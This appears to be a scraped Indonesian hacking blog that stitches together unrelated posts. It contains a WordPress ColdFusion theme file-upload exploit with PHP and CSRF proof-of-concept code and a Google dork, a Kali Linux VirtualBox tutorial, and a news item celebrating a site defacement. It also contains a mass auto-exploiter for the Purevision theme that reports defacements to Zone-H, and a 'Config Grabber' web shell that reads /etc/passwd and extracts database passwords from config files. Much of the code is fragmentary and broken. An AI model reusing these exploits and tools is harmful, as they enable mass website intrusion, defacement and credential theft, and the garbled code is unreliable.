WordPress theme ColdFusion Arbitrary File Upload Vulnerability

#-Title: WordPress theme ColdFusion Arbitrary File Upload Vulnerability
#-Author: Smail Max / Bet0
#-Date: 10/31/2013
#- Vendor : themeforest. net
#- Link Download : themeforest. net/item/coldfusion-responsive-fullscreen-video-image-audio/4381748
#-Google Dork: inurl:wp-content/themes/ColdFusion
#- Tested on : Win7, Linux
#- Fixed in ??

Information of Bug : 

Bugtraq ID: 63523
Class: Input Validation Error
CVE: -
Remote: Yes
Local: No
Published: Nov 01 2013 12:00AM
Updated: Nov 01 2013 12:00AM
Credit: Bet0
When Vulnerable: {"status":"NOK", "ERR":"This file is incorect"}

Description : 
The ColdFusion Theme for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. 

An attacker can exploit this issue to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access to the application; other attacks are also possible.

Currently, we are not aware of any vendor-supplied patches.

-- Proof Of Concept --

With Remote Code :

$ch = curl_init("http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
print "$postResult";

With CSRF :

action="http://localcrot/wp-content/themes/ColdFusion/includes/uploadify/upload_settings_image.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type="submit" name="submit" value="3xploi7ed !">

If Succesfully (with CSRF) : 

Shell Path : Here

Site Demo (Infected) :

Cara Fullscreen Kali Linux Di Virtualbox | How To Fullscreen Kali Linux in VirtualBox

#KeyWord :
Cara Fullscreen Kali Linux Di Virtualbox 
How To Fullscreen Kali Linux on VirtualBox
How to Change Kali Linux Screen Resolution on Virtual Box
Can’t make Kali Linux run in full screen on VirtualBox

Pada kesempatan yang baik ini saya akan memberikan tutorial Fullscreen Kali Linux Di Virtualbox. Waktu itu saya juga pernah pakai ubuntu dan berhasil fullscreen, lalu saya bosan dan beralih ke Kali linux. Saya menggunakan VirtualBox sebagai medianya .. ( Males dual boot :v ) 

Nah, biar kayak asli saya ingin membuatnya menjadi fullscreen, tetapi ada beberapa masalah yang terjadi. Lalu saya mencoba metode ini dan berhasil. Karena ada niat pasti ada jalan keluar. gak usah banyak cingcong langsung aja.. 

Requirement :
- Kali linux
- VirtualBox

Steps :

1.  Install Dependensi
Buka Terminal Kali. update Package Manager dengan menjalankan Command dibawah ini 

apt-get update
apt-get upgrade -y
apt-get dist-upgrade -y

    dan Sistem akan menginstal Package Manager yang dibutuhkan.
Jika sudah selesai Install Dependensi dengan mengikuti Command dibawah ini :

apt-get install linux-headers-$(uname -r) -y

2. Mount VirtualBox Guest Additions drive
Dari menubar divitual box anda. Click Devices -> Insert Guest Additions CD Image.. blabla

3. Copy Dan Install Paket
Copy & paste " " 

cp /media/cdrom/ /root/Desktop/
cd /root/Desktop/

Buat menjadi executable:

chmod 755 /root/
Lalu Install :

*Note : Jika Muncul gambar dibawah seperti ini berarti anda berhasil 

Jika Berhasil. Reboot / restart lah virtual box anda .

Joomla Com_user Helper Auto Exploit + Scanner

# Title : Joomla Com_user Exploit Helper v1.1
# Coded by : Anon?M ID
# Type : Exe


Ya pada kali ini saya akan membagikan tools buatan bang Angki yaitu Joomla Com_user Exploit Helper v1.1. Tools ini sangat berguna bagi kamu yang bermain dengan com_user .. mungkin katanya com_user sudah punah ? tetapi masih ada sampai saat ini yang masih dapat web com_user..

Tools ini bisanya sebagai scanner bahkan sekaligus auto exploiter .. 

yaudah jangan banyak chingchong .. chek it out !

Here !

Situs JKT48 Di Hack Lagi !

       Lagi, Seorang hacker kembali menyerang situs Indonesia, dan kali ini korbannya yaitu situs resmi JKT48 Idol Grup yang sangat Terkenal itu pada tanggal 15/11/2015 Jam 02:29:00 data ini kamu ambil dari mirror Zone h.
Terpampang Background hitam dengan foto perempuan ditengahnya. dan tertera tulisan " got Kissed by ~ Hidayat ~

Web JKT48 memang sudah beberapa kali diretas oleh beberapa hacker. menurut data Website JKT48 diretas sebanyak 3 kali . pertama kali dihack oleh hacker bernick Katon dari Surabaya BlackHat dengan Method DNS Hijacking ( Pengalihan DNS ) lalu yang kedua di hack kembali Oleh UnknownYmouz dari Indonesian Code Party dengan Method kurang jelas dan yang terakhir atau saat ini dihack kembali Oleh Kcnewbie dari JKT48 Cyber Team dan dengan Method DNS Hijack Juga .

Selain web Official JKT48 yang dihack ternyata Subdomain Blognya juga ikut kena. Subdomain diretas Oleh Nabilaholic404. tapi saat ini telah mercusuar. Sampai berita ini diturunkan Web JKT48 Masih terdeface. 

Berikut ini Mirror JKT 48 : > Oleh Katon 

Wordpress Purevision Themes Auto Exploiter

#- Wordpress WP Purevision Themes Mass Exploiter
#- Coded By : Synchronizer
#- Team : Sanjungan Jiwa Team
#- Using this Tool >> php sync.php list.txt
#- Example >> Name.php = This file name | list.txt = your list target


# Wordpress WP Purevision Themes Mass Exploiter
# Coded By : Synchronizer
# Team : Sanjungan Jiwa Team
# Using this Exploit >> php sync.php list.txt
# Example >> Name.php = This file name | list.txt = your list target
# Thanks to : All Member Sanjungan Jiwa Team


# Wordpress Purevision Themes Mass & Auto Exploiter #
# Coded By Synchronizer #
# Merubah Copyright, tidak menjadikan anda seorang coder #


echo "\n";

foreach($j as $site){
echo "\n\n\t[+] Exploiting => ".$site;

$uploadfile="x.txt"; #Your file (give text Hacked by Your Nickname)
$ch =curl_init($site.'/wp-content/themes/purevision/scripts/admin/uploadify/uploadify.php');
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$sync = curl_exec($ch);
$access = ($site).'/'.($uploadfile);
if(eregi('Hacked By Synchronizer',$f_sync)){ #Edit this text as your Nick/text on your file x.txt
echo "\n\t[x]".'Success => '.$access."\n";
$ch = curl_init ("");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=./Synchronizer&domain1=http://$access&hackmode=1&reason=1");
if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
echo "\n\t[x] Zone-h => Ok ". "\n\n";
echo "\n\t[x] Zone-h => No". "\n\n"; }
curl_close ($ch);
echo "\n\t[x] ".$site." => Exploiting Failed :( \n\n";


Config Grabber by Slackercode


if(!empty($_SERVER['HTTP_USER_AGENT'])) {
$bot = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Yahoo");
if(preg_match('/' . implode('|', $bot) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');

echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">
<html xmlns="" xml:lang="en" lang="en">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
<meta name="robots" content="noindex,nofollow" />
<title>Config Grabber | Slackercode Priv8 Tool</title>
<link rel="SHORTCUT ICON" href=""/>

<style type="text/css">
body {
background-color: #000000;
text-align: left;
color: #59E817;

if(strtolower(substr(PHP_OS, 0, 3)) == "win"){
echo '<script>alert("Skid this won\'t work on Windows")</script>';
if($_POST["m"] && !$_POST["passwd"]==""){
@mkdir("slackerc0de", 0777);
Options all
Options +Indexes
Options +FollowSymLinks
DirectoryIndex india.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
AddType text/plain .conf
AddType text/plain .sql
AddType text/plain .log
Require None
Satisfy Any";
foreach($etc_passwd as $passwd){
$user =$pawd[0];











//password grab

function entre2v2($text,$marqueurDebutLien,$marqueurFinLien)

$ar0=explode($marqueurDebutLien, $text);
$ar1=explode($marqueurFinLien, $ar0[1]);
return $ar;


$r= 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME'])."/slackerc0de/";

foreach($users as $user)

foreach($confi as $co)


$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $uel);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/2009032609 Firefox/3.0.8');
$result['EXE'] = curl_exec($ch);

if($uxl && preg_match('/table_prefix/i',$uxl))


$dbp=entre2v2($uxl,"DB_PASSWORD', '","');");

elseif($uxl && preg_match('/cc_encryption_hash/i',$uxl))


$dbp=entre2v2($uxl,"db_password = '","';");


elseif($uxl && preg_match('/dbprefix/i',$uxl))


$db=entre2v2($uxl,"password = '","';");
elseif($uxl && preg_match('/admincpdir/i',$uxl))


$db=entre2v2($uxl,"password'] = '","';");

elseif($uxl && preg_match('/DB_DATABASE/i',$uxl))


$db=entre2v2($uxl,"DB_PASSWORD', '","');");
elseif($uxl && preg_match('/dbpass/i',$uxl))


$db=entre2v2($uxl,"dbpass = '","';");
elseif($uxl && preg_match('/dbpass/i',$uxl))


$db=entre2v2($uxl,"dbpass = '","';");

elseif($uxl && preg_match('/dbpass/i',$uxl))


$db=entre2v2($uxl,"dbpass = \"","\";");

echo "<center>
<a href=\"slackerc0de/root/\">./Server root</a>
<br><a href=\"slackerc0de/Passwords.txt\">./Passwords</a>
<br><a href=\"slackerc0de/\">./Configurations</a></center>";
echo "<center>
<form method=\"POST\">
<textarea name=\"passwd\" style=\"border:1px dotted #59E817; width: 543px; height: 420px; background-color:#0C0C0C; font-family:Tahoma; font-size:8pt; color:#59E817\">";
$file = '/etc/passwd';
$read = @fopen($file, 'r');
if ($read){
$body = @fread($read, @filesize($file));
echo "".htmlentities($body)."";
$read = @show_source($file) ;
$read = @highlight_file($file);
$ara = posix_getpwuid($uid);
if (!empty($ara))
while (list ($key, $val) = each($ara))
print "$val:";
print "\n";


echo "</textarea>
<p><input name=\"m\" size=\"80\" value=\"Start\" type=\"submit\" style=\"border:1px dotted #59E817; width: 99; font-family:Tahoma; font-size:10pt; color:#59E817; text-transform:uppercase; height:23; background-color:#0C0C0C\"/></p>
echo "</body>